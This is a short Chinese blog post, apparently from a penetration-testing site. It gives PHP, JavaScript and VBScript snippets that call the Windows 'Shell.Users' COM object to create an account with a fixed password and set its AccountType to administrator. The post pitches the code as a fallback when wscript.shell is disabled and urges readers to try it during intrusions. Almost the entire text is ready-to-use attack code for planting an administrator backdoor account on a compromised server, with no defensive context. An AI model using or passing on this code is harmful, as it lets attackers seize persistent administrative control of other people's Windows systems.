php版shell.users加帐户
- 发表于
- 周边
在php环境下wscript.shell 组件被禁用不妨试试shell.user
1 2 3 4 5 6 7 8 9 |
<?php echo "<div align=center><b>PHP 版Shell.Users加管理员帐号</b></div>"; $username="user"; $password="pass"; $su = new COM("Shell.Users"); $h=$su->create($username); $h->changePassword($password,""); $h->setting["AccountType"] = 3;//这句很重要可以把用户加入administrators 组, ?> |
下面是 LCX 的代码
1 2 3 4 5 |
//js: var o=new ActiveXObject( "Shell.Users" ); z=o.create("test") ; z.changePassword("123456","") z.setting("AccountType")=3; |
vbs:
1 2 3 4 |
Set o=CreateObject( "Shell.Users" ) Set z=o.create("test") z.changePassword "123456","" z.setting("AccountType")=3 |
在渗透的时候试试这些资料吧。
原文连接:php版shell.users加帐户
所有媒体,可在保留署名、
原文连接
的情况下转载,若非则不得使用我方内容。